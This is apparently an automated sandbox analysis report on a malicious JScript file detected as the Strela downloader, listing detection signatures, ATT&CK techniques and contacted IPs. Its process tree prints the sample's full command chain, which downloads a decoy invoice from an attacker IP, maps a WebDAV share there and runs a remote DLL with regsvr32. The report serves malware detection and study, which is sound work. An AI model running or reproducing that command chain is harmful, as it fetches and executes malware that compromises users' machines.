Edit tour
Windows
Analysis Report
32230219901300318079.js
Overview
General Information
| Sample name: | 32230219901300318079.js |
| Analysis ID: | 1589929 |
| MD5: | 9e11f2fdd1586d08d06634ab6ae7135d |
| SHA1: | e2d084a57790fe295ca9e4bc8add72283d60743d |
| SHA256: | ef2a8a716be4c3b2b978fdff3a8e84595b9ae5d93aa0870882e880b1a226fa29 |
| Tags: | jsuser-cocaman |
| Infos: |   |
 | |
Detection
Strela Downloader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
JScript performs obfuscated calls to suspicious functions
Sigma detected: Powershell launch regsvr32
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
wscript.exe (PID: 6728 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\32230 2199013003 18079.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 6852 cmdline: "C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\470 1897614160 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7068 cmdline: powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) 
Acrobat.exe (PID: 2304 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 3868 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7232 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1688,i ,145089733 0750692058 6,51894948 2235851275 6,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
svchost.exe (PID: 7164 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |   |
|---|
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): | ||
| Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: | ||
| Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: frack113: | ||
| Source: | Author: vburov: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
Spam, unwanted Advertisements and Ransom Demands | |
|---|
| Source: | File source: | ||
System Summary | |
|---|
| Source: | COM Object queried: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Initial sample: | ||
| Source: | Classification label: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
Data Obfuscation | |
|---|
| Source: | Anti Malware Scan Interface: | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | COM call: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window found: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep count: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
Stealing of Sensitive Information | |
|---|
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 22 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 22 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 3% | ReversingLabs |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe |
⊘No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false | high | |||
| false | high | |||
| false |
| unknown | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown | ||
| false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
| IP |
|---|
| 127.0.0.1 |
| Joe Sandbox version: | 42.0.0 Malachite |
| Analysis ID: | 1589929 |
| Start date and time: | 2025-01-13 10:32:21 +01:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 4m 54s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
| Number of analysed new started processes analysed: | 16 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Sample name: | 32230219901300318079.js |
| Detection: | MAL |
| Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
| EGA Information: | Failed |
| HCA Information: |
|
| Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 2.22.242.11, 2.22.242.123, 172.64.41.3, 162.159.61.3, 184.28.90.27, 199.232.210.172, 2.23.197.184, 2.16.168.107, 2.16.168.105, 23.200.0.33, 23.200.0.21, 192.168.2.4, 52.149.20.212, 23.47.168.24, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
